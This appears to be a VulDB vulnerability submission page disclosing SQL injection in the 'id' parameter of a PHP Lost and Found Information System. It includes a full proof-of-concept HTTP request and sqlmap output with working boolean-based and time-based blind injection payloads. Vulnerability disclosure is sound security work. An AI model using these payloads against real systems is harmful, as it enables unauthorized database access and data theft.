Soumettre #155230: SQL Injection in view category function in Lost and Found Information Systeminformation

TitreSQL Injection in view category function in Lost and Found Information System
DescriptionSQL Injection in view category function in Lost and Found Information System 1.0 parameter: id Producion: Lost and Found Information System Version: 1.0 PoC: Request: GET /php-lfis/admin/?page=categories/view_category&id=2 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/php-lfis/admin/?page=categories Connection: close Cookie: remember_me_name=bMGFrQaFzDhuoLmztZCT; remember_me_pwd=YMSm3Q2wFDHaHLQ5eZPKc42oU7CaK8IlA%40q1; remember_me_lang=en; Hm_lvt_c790ac2bdc2f385757ecd0183206108d=1680329430; Hm_lvt_5320b69f4f1caa9328dfada73c8e6a75=1680329567; PowerBB_username=xss; PowerBB_password=8879f85d0170cba2a4328bbb5a457c6a; menu_contracted=false; __atuvc=1%7C16; PHPSESSID=5d8ijq26o4ufqpqn4luc1nmpak Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Run request with sqlmap and output: GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection point(s) with a total of 185 HTTP(s) requests: --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: page=categories/view_category&id=2' AND 9766=9766 AND 'VGnK'='VGnK Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: page=categories/view_category&id=2' AND (SELECT 6692 FROM (SELECT(SLEEP(5)))HXST) AND 'bNNb'='bNNb ---
La source⚠️ https://www.sourcecodester.com/php/16525/lost-and-found-information-system-using-php-and-mysql-db-source-code-free-download.html
Utilisateur
 huutuanbg97 (UID 45015)
Soumission11/05/2023 17:32 (il y a 3 ans)
Modérer12/05/2023 08:01 (14 hours later)
StatutAccepté
Entrée VulDB228885 [SourceCodester Lost and Found Information System 1.0 GET Parameter view_category ID injection SQL]
Points20

PrécédentAperçuSuivant

Do you need the next level of professionalism?

Upgrade your account now!